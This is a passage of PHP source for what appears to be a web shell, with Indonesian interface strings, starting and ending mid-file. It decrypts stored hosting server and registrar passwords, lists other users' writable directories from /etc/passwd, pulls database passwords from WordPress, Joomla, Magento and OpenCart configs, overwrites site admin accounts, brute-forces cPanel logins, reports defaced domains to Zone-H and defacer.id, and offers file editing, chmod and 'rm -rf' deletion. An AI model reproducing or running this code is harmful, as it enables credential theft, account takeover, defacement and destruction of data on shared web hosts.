1154.  $db_name=($_POST['db_name']);
1155.  $cc_encryption_hash=($_POST['cc_encryption_hash']);
1156.  
1157.  
1158.  
1159.     $link=mysql_connect($db_host,$db_username,$db_password) ;
1160.         mysql_select_db($db_name,$link) ;
1161. $query = mysql_query("SELECT * FROM tblservers");
1162. while($v = mysql_fetch_array($query)) {
1163. $ipaddress = $v['ipaddress'];
1164. $username = $v['username'];
1165. $type = $v['type'];
1166. $active = $v['active'];
1167. $hostname = $v['hostname'];
1168. echo("<center><table border='1'>");
1169. $password = decrypt ($v['password'], $cc_encryption_hash);
1170. echo("<tr><td>Type</td><td>$type</td></tr>");
1171. echo("<tr><td>Active</td><td>$active</td></tr>");
1172. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
1173. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
1174. echo("<tr><td>Username</td><td>$username</td></tr>");
1175. echo("<tr><td>Password</td><td>$password</td></tr>");
1176.  
1177. echo "</table><br><br></center>";
1178. }
1179.  
1180.     $link=mysql_connect($db_host,$db_username,$db_password) ;
1181.         mysql_select_db($db_name,$link) ;
1182. $query = mysql_query("SELECT * FROM tblregistrars");
1183. echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
1184. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
1185. while($v = mysql_fetch_array($query)) {
1186. $registrar     = $v['registrar'];
1187. $setting = $v['setting'];
1188. $value = decrypt ($v['value'], $cc_encryption_hash);
1189. if ($value=="") {
1190. $value=0;
1191. }
1192. $password = decrypt ($v['password'], $cc_encryption_hash);
1193. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
1194. }
1195. }
1196.    
1197.  
1198. } elseif($_GET['do'] == 'jumping') {
1199.     $i = 0;
1200.     echo "<div class='margin: 5px auto;'>";
1201.     if(preg_match("/hsphere/", $dir)) {
1202.         $urls = explode("\r\n", $_POST['url']);
1203.         if(isset($_POST['jump'])) {
1204.             echo "<pre>";
1205.             foreach($urls as $url) {
1206.                 $url = str_replace(array("http://","www."), "", strtolower($url));
1207.                 $etc = "/etc/passwd";
1208.                 $f = fopen($etc,"r");
1209.                 while($gets = fgets($f)) {
1210.                     $pecah = explode(":", $gets);
1211.                     $user = $pecah[0];
1212.                     $dir_user = "/hsphere/local/home/$user";
1213.                     if(is_dir($dir_user) === true) {
1214.                         $url_user = $dir_user."/".$url;
1215.                         if(is_readable($url_user)) {
1216.                             $i++;
1217.                             $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
1218.                             if(is_writable($url_user)) {
1219.                                 $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
1220.                             }
1221.                             echo $jrw."<br>";
1222.                         }
1223.                     }
1224.                 }
1225.             }
1226.         if($i == 0) {
1227.         } else {
1228.             echo "<br>Total ada ".$i." Kamar di ".$ip;
1229.         }
1230.         echo "</pre>";
1231.         } else {
1232.             echo '<center>
1233.                   <form method="post">
1234.                   List Domains: <br>
1235.                   <textarea name="url" style="width: 500px; height: 250px;">';
1236.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
1237.             while($getss = fgets($fp)) {
1238.                 echo $getss;
1239.             }
1240.             echo  '</textarea><br>
1241.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
1242.                   </form></center>';
1243.         }
1244.     } elseif(preg_match("/vhosts/", $dir)) {
1245.         $urls = explode("\r\n", $_POST['url']);
1246.         if(isset($_POST['jump'])) {
1247.             echo "<pre>";
1248.             foreach($urls as $url) {
1249.                 $web_vh = "/var/www/vhosts/$url/httpdocs";
1250.                 if(is_dir($web_vh) === true) {
1251.                     if(is_readable($web_vh)) {
1252.                         $i++;
1253.                         $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
1254.                         if(is_writable($web_vh)) {
1255.                             $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
1256.                         }
1257.                         echo $jrw."<br>";
1258.                     }
1259.                 }
1260.             }
1261.         if($i == 0) {
1262.         } else {
1263.             echo "<br>Total ada ".$i." Kamar di ".$ip;
1264.         }
1265.         echo "</pre>";
1266.         } else {
1267.             echo '<center>
1268.                   <form method="post">
1269.                   List Domains: <br>
1270.                   <textarea name="url" style="width: 500px; height: 250px;">';
1271.                   bing("ip:$ip");
1272.             echo  '</textarea><br>
1273.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
1274.                   </form></center>';
1275.         }
1276.     } else {
1277.         echo "<pre>";
1278.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
1279.         while($passwd = fgets($etc)) {
1280.             if($passwd == '' || !$etc) {
1281.                 echo "<font color=red>Can't read /etc/passwd</font>";
1282.             } else {
1283.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
1284.                 foreach($user_jumping[1] as $user_idx_jump) {
1285.                     $user_jumping_dir = "/home/$user_idx_jump/public_html";
1286.                     if(is_readable($user_jumping_dir)) {
1287.                         $i++;
1288.                         $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
1289.                         if(is_writable($user_jumping_dir)) {
1290.                             $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
1291.                         }
1292.                         echo $jrw;
1293.                         if(function_exists('posix_getpwuid')) {
1294.                             $domain_jump = file_get_contents("/etc/named.conf");   
1295.                             if($domain_jump == '') {
1296.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
1297.                             } else {
1298.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
1299.                                 foreach($domains_jump[1] as $dj) {
1300.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1301.                                     $user_jumping_url = $user_jumping_url['name'];
1302.                                     if($user_jumping_url == $user_idx_jump) {
1303.                                         echo " => ( <u>$dj</u> )<br>";
1304.                                         break;
1305.                                     }
1306.                                 }
1307.                             }
1308.                         } else {
1309.                             echo "<br>";
1310.                         }
1311.                     }
1312.                 }
1313.             }
1314.         }
1315.         if($i == 0) {
1316.         } else {
1317.             echo "<br>Total ada ".$i." Kamar di ".$ip;
1318.         }
1319.         echo "</pre>";
1320.     }
1321.     echo "</div>";
1322.  
1323. } elseif($_GET['do'] == 'auto_edit_user') {
1324.     if($_POST['hajar']) {
1325.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
1326.             echo "username atau password harus lebih dari 6 karakter";
1327.         } else {
1328.             $user_baru = $_POST['user_baru'];
1329.             $pass_baru = md5($_POST['pass_baru']);
1330.             $conf = $_POST['config_dir'];
1331.             $scan_conf = scandir($conf);
1332.             foreach($scan_conf as $file_conf) {
1333.                 if(!is_file("$conf/$file_conf")) continue;
1334.                 $config = file_get_contents("$conf/$file_conf");
1335.                 if(preg_match("/JConfig|joomla/",$config)) {
1336.                     $dbhost = ambilkata($config,"host = '","'");
1337.                     $dbuser = ambilkata($config,"user = '","'");
1338.                     $dbpass = ambilkata($config,"password = '","'");
1339.                     $dbname = ambilkata($config,"db = '","'");
1340.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
1341.                     $prefix = $dbprefix."users";
1342.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1343.                     $db = mysql_select_db($dbname);
1344.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1345.                     $result = mysql_fetch_array($q);
1346.                     $id = $result['id'];
1347.                     $site = ambilkata($config,"sitename = '","'");
1348.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
1349.                     echo "Config => ".$file_conf."<br>";
1350.                     echo "CMS => Joomla<br>";
1351.                     if($site == '') {
1352.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
1353.                     } else {
1354.                         echo "Sitename => $site<br>";
1355.                     }
1356.                     if(!$update OR !$conn OR !$db) {
1357.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1358.                     } else {
1359.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1360.                     }
1361.                     mysql_close($conn);
1362.                 } elseif(preg_match("/WordPress/",$config)) {
1363.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
1364.                     $dbuser = ambilkata($config,"DB_USER', '","'");
1365.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1366.                     $dbname = ambilkata($config,"DB_NAME', '","'");
1367.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
1368.                     $prefix = $dbprefix."users";
1369.                     $option = $dbprefix."options";
1370.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1371.                     $db = mysql_select_db($dbname);
1372.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1373.                     $result = mysql_fetch_array($q);
1374.                     $id = $result[ID];
1375.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1376.                     $result2 = mysql_fetch_array($q2);
1377.                     $target = $result2[option_value];
1378.                     if($target == '') {
1379.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1380.                     } else {
1381.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
1382.                     }
1383.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
1384.                     echo "Config => ".$file_conf."<br>";
1385.                     echo "CMS => Wordpress<br>";
1386.                     echo $url_target;
1387.                     if(!$update OR !$conn OR !$db) {
1388.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1389.                     } else {
1390.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1391.                     }
1392.                     mysql_close($conn);
1393.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
1394.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
1395.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
1396.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
1397.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
1398.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
1399.                     $prefix = $dbprefix."admin_user";
1400.                     $option = $dbprefix."core_config_data";
1401.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1402.                     $db = mysql_select_db($dbname);
1403.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1404.                     $result = mysql_fetch_array($q);
1405.                     $id = $result[user_id];
1406.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
1407.                     $result2 = mysql_fetch_array($q2);
1408.                     $target = $result2[value];
1409.                     if($target == '') {
1410.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1411.                     } else {
1412.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
1413.                     }
1414.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1415.                     echo "Config => ".$file_conf."<br>";
1416.                     echo "CMS => Magento<br>";
1417.                     echo $url_target;
1418.                     if(!$update OR !$conn OR !$db) {
1419.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1420.                     } else {
1421.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1422.                     }
1423.                     mysql_close($conn);
1424.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
1425.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
1426.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
1427.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
1428.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
1429.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
1430.                     $prefix = $dbprefix."user";
1431.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1432.                     $db = mysql_select_db($dbname);
1433.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1434.                     $result = mysql_fetch_array($q);
1435.                     $id = $result[user_id];
1436.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
1437.                     if($target == '') {
1438.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1439.                     } else {
1440.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
1441.                     }
1442.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1443.                     echo "Config => ".$file_conf."<br>";
1444.                     echo "CMS => OpenCart<br>";
1445.                     echo $url_target;
1446.                     if(!$update OR !$conn OR !$db) {
1447.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1448.                     } else {
1449.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1450.                     }
1451.                     mysql_close($conn);
1452.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
1453.                     $dbhost = ambilkata($config,'server = "','"');
1454.                     $dbuser = ambilkata($config,'username = "','"');
1455.                     $dbpass = ambilkata($config,'password = "','"');
1456.                     $dbname = ambilkata($config,'database = "','"');
1457.                     $prefix = "users";
1458.                     $option = "identitas";
1459.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1460.                     $db = mysql_select_db($dbname);
1461.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
1462.                     $result = mysql_fetch_array($q);
1463.                     $target = $result[alamat_website];
1464.                     if($target == '') {
1465.                         $target2 = $result[url];
1466.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1467.                         if($target2 == '') {
1468.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1469.                         } else {
1470.                             $cek_login3 = file_get_contents("$target2/adminweb/");
1471.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
1472.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
1473.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
1474.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
1475.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
1476.                             } else {
1477.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1478.                             }
1479.                         }
1480.                     } else {
1481.                         $cek_login = file_get_contents("$target/adminweb/");
1482.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
1483.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
1484.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
1485.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
1486.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
1487.                         } else {
1488.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1489.                         }
1490.                     }
1491.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
1492.                     echo "Config => ".$file_conf."<br>";
1493.                     echo "CMS => Lokomedia<br>";
1494.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
1495.                         echo $url_target2;
1496.                     } else {
1497.                         echo $url_target;
1498.                     }
1499.                     if(!$update OR !$conn OR !$db) {
1500.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1501.                     } else {
1502.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1503.                     }
1504.                     mysql_close($conn);
1505.                 }
1506.             }
1507.         }
1508.     } else {
1509.         echo "<center>
1510.         <h1>Auto Edit User Config</h1>
1511.         <form method='post'>
1512.         DIR Config: <br>
1513.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1514.         Set User & Pass: <br>
1515.         <input type='text' name='user_baru' value='42247551N5' placeholder='user_baru'><br>
1516.         <input type='text' name='pass_baru' value='42247551N5' placeholder='pass_baru'><br>
1517.         <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
1518.         </form>
1519. <br>
1520.         ";
1521.     }
1522. } elseif($_GET['do'] == 'cpanel') {
1523.     if($_POST['crack']) {
1524.         $usercp = explode("\r\n", $_POST['user_cp']);
1525.         $passcp = explode("\r\n", $_POST['pass_cp']);
1526.         $i = 0;
1527.         foreach($usercp as $ucp) {
1528.             foreach($passcp as $pcp) {
1529.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
1530.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1531.                     } else {
1532.                         $_SESSION[$ucp] = "1";
1533.                         $_SESSION[$pcp] = "1";
1534.                         if($ucp == '' || $pcp == '') {
1535.                            
1536.                         } else {
1537.                             $i++;
1538.                             if(function_exists('posix_getpwuid')) {
1539.                                 $domain_cp = file_get_contents("/etc/named.conf"); 
1540.                                 if($domain_cp == '') {
1541.                                     $dom =  "<font color=red>gabisa ambil nama domain nya</font>";
1542.                                 } else {
1543.                                     preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1544.                                     foreach($domains_cp[1] as $dj) {
1545.                                         $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1546.                                         $user_cp_url = $user_cp_url['name'];
1547.                                         if($user_cp_url == $ucp) {
1548.                                             $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
1549.                                             break;
1550.                                         }
1551.                                     }
1552.                                 }
1553.                             } else {
1554.                                 $dom = "<font color=red>function is Disable by system</font>";
1555.                             }
1556.                             echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
1557.                         }
1558.                     }
1559.                 }
1560.             }
1561.         }
1562.         if($i == 0) {
1563.         } else {
1564.             echo "<br>Succes Crack ".$i." Cpanel";
1565.         }
1566.     } else {
1567.         echo "<center>
1568.         <form method='post'>
1569.         USER: <br>
1570.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1571.         $_usercp = fopen("/etc/passwd","r");
1572.         while($getu = fgets($_usercp)) {
1573.             if($getu == '' || !$_usercp) {
1574.                 echo "<font color=red>Can't read /etc/passwd</font>";
1575.             } else {
1576.                 preg_match_all("/(.*?):x:/", $getu, $u);
1577.                 foreach($u[1] as $user_cp) {
1578.                         if(is_dir("/home/$user_cp/public_html")) {
1579.                             echo "$user_cp\n";
1580.                     }
1581.                 }
1582.             }
1583.         }
1584.         echo "</textarea><br>
1585.         PASS: <br>
1586.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1587.         function cp_pass($dir) {
1588.             $pass = "";
1589.             $dira = scandir($dir);
1590.             foreach($dira as $dirb) {
1591.                 if(!is_file("$dir/$dirb")) continue;
1592.                 $ambil = file_get_contents("$dir/$dirb");
1593.                 if(preg_match("/WordPress/", $ambil)) {
1594.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1595.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1596.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
1597.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1598.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1599.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1600.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
1601.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1602.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1603.                 } elseif(preg_match("/^[client]$/", $ambil)) {
1604.                     preg_match("/password=(.*?)/", $ambil, $pass1);
1605.                     if(preg_match('/"/', $pass1[1])) {
1606.                         $pass1[1] = str_replace('"', "", $pass1[1]);
1607.                         $pass .= $pass1[1]."\n";
1608.                     } else {
1609.                         $pass .= $pass1[1]."\n";
1610.                     }
1611.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1612.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1613.                 }
1614.             }
1615.             echo $pass;
1616.         }
1617.         $cp_pass = cp_pass($dir);
1618.         echo $cp_pass;
1619.         echo "</textarea><br>
1620.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
1621.         </form>
1622. <br></center>";
1623.     }
1624. } elseif($_GET['do'] == 'mirror') {
1625. @ini_set('display_errors', 0);
1626. echo "
1627. <center>
1628. <form method='post'>
1629.         <u>Defacer</u>: <br>
1630.         <input style='color:red;background:black;' type='text' name='hekel' size='50' value=''><br>
1631.         <u>Team</u>: <br>
1632.         <input style='color:red;background:black;' type='text' name='tim' size='50' value=''><br>
1633.         <u>Domains</u>: <br>
1634.         <textarea style='width: 450px; height: 150px;color:red;background:black;'' name='sites'></textarea><br>
1635.         <input style='color:red;background:black;' type='submit' name='go' value='Submit' style='width: 450px;'>
1636.         </form><br><font color=silver>";
1637. $site = explode("\r\n", $_POST['sites']);
1638. $go = $_POST['go'];
1639. $hekel = $_POST['hekel'];
1640. $tim = $_POST['tim'];
1641. if($go) {
1642. foreach($site as $sites) {
1643. $ch3 = curl_init ("http://www.leetszone.com/noti_act.php");
1644. curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
1645. curl_setopt ($ch3, CURLOPT_POST, 1);
1646. curl_setopt ($ch3, CURLOPT_POSTFIELDS, "hacker=$hekel&team=$tim&url=$sites&poc=Social Engineering");
1647. curl_exec ($ch3);
1648. echo "Send to LeetsZone >> Done<br>";
1649. }
1650. }
1651. if($go) {
1652. foreach($site as $sites) {
1653. $ch3 = curl_init ("http://www.zone-h.com/notify/single");
1654. curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
1655. curl_setopt ($ch3, CURLOPT_POST, 1);
1656. curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=$hekel&domain1=$sites&hackmode=1&reason=1");
1657. curl_exec ($ch3);
1658. echo "Send to Zone-H >> Done<br>";
1659. }
1660. }
1661.  
1662. if($go) {
1663. foreach($site as $sites) {
1664. $zh = $sites;
1665. $form_url = "https://www.defacer.id/notify";
1666. $data_to_post = array();
1667. $data_to_post['attacker'] = "$hekel";
1668. $data_to_post['team'] = "$tim";
1669. $data_to_post['poc'] = 'SQL Injection';
1670. $data_to_post['url'] = "$zh";
1671. $curl = curl_init();
1672. curl_setopt($curl,CURLOPT_URL, $form_url);
1673. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
1674. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
1675. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
1676. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
1677. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
1678. curl_exec($curl);
1679. echo "Send to DefacerID >> Done<br>";
1680. }
1681. }
1682.  
1683. } elseif($_GET['act'] == 'newfile') {
1684.     if($_POST['new_save_file']) {
1685.         $newfile = htmlspecialchars($_POST['newfile']);
1686.         $fopen = fopen($newfile, "a+");
1687.         if($fopen) {
1688.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
1689.         } else {
1690.             $act = "<font color=red>permission denied</font>";
1691.         }
1692.     }
1693.     echo $act;
1694.     echo "<form method='post'>
1695.     Filename: <input type='text' name='newfile' value='$dir/azx.php' style='width: 450px;' height='10'>
1696.     <input type='submit' name='new_save_file' value='Submit'>
1697.     </form>";
1698. } elseif($_GET['act'] == 'newfolder') {
1699.     if($_POST['new_save_folder']) {
1700.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
1701.         if(!mkdir($new_folder)) {
1702.             $act = "<font color=red>permission denied</font>";
1703.         } else {
1704.             $act = "<script>window.location='?dir=".$dir."';</script>";
1705.         }
1706.     }
1707.     echo $act;
1708.     echo "<form method='post'>
1709.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
1710.     <input type='submit' name='new_save_folder' value='Submit'>
1711.     </form>";
1712. } elseif($_GET['act'] == 'rename_dir') {
1713.     if($_POST['dir_rename']) {
1714.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
1715.         if($dir_rename) {
1716.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
1717.         } else {
1718.             $act = "<font color=red>permission denied</font>";
1719.         }
1720.     echo "".$act."<br>";
1721.     }
1722.     echo "<form method='post'>
1723.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
1724.     <input type='submit' name='dir_rename' value='rename'>
1725.     </form>";
1726. } elseif($_GET['act'] == 'chmod_dir') {
1727. echo "<form method=post><input type='text' name='jmbt' value='".$dir."'> >> <input type='text' name='kntl' value='0755'><input type='submit' value='Chmod' name='azztssns'></form><br>";
1728. if($_POST['azztssns']) {
1729. $jmbt = $_POST['jmbt'];
1730. $kntl = $_POST['kntl'];
1731. exe("chmod ".$kntl." ".$jmbt);
1732. echo "<font color=lime>Chmod to ".$kntl." Successfully</font><br>";
1733.  
1734. }
1735. } elseif($_GET['act'] == 'delete_dir') {
1736.     if(is_dir($dir)) {
1737.         if(is_writable($dir)) {
1738.             @rmdir($dir);
1739.             @exe("rm -rf $dir");
1740.             @exe("rmdir /s /q $dir");
1741.             rmdir($dir);
1742.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
1743.         } else {
1744.             $act = "<font color=red>could not remove ".basename($dir)."</font>";
1745.         }
1746.     }
1747.     echo $act;
1748. } elseif($_GET['act'] == 'view') {
1749.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'>chmod</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
1750.     echo "<fieldset><pre>".htmlspecialchars(@file_get_contents($_GET['file']))."</pre></fieldset>";
1751. }
1752. elseif($_GET['act'] == 'chmod') {
1753. echo "<form method=post><input type='text' name='jmbt' value='".$_GET['file']."'> >> <input type='text' name='kntl' value='0755'><input type='submit' value='Chmod' name='azztssns'></form><br>";
1754. if($_POST['azztssns']) {
1755. $jmbt = $_POST['jmbt'];
1756. $kntl = $_POST['kntl'];
1757. exe("chmod ".$kntl." ".$jmbt);
1758. echo "<font color=lime>Chmod to ".$kntl." Successfully</font><br>";
1759.  
1760. }
1761. }
1762.  elseif($_GET['act'] == 'edit') {
1763.     if($_POST['save']) {
1764.         $save = file_put_contents($_GET['file'], $_POST['src']);
1765.         if($save) {
1766.             $act = "<font color=lime>Saved!</font>";
1767.         } else {
1768.             $act = "<font color=red>permission denied</font>";
1769.         }
1770.     echo "".$act."<br>";
1771.     }
1772.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'>chmod</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
1773.     echo "<form method='post'>
1774.     <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
1775.     <input type='submit' value='Save' name='save' style='width: 500px;'>
1776.     </form>";
1777. } elseif($_GET['act'] == 'rename') {
1778.     if($_POST['do_rename']) {
1779.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
1780.         if($rename) {
1781.             $act = "<script>window.location='?dir=".$dir."';</script>";
1782.         } else {
1783.             $act = "<font color=red>permission denied</font>";
1784.         }
1785.     echo "".$act."<br>";
1786.     }
1787.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
1788.     echo "<form method='post'>
1789.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
1790.     <input type='submit' name='do_rename' value='rename'>
1791.     </form>";
1792. } elseif($_GET['act'] == 'delete') {
1793.     $delete = unlink($_GET['file']);
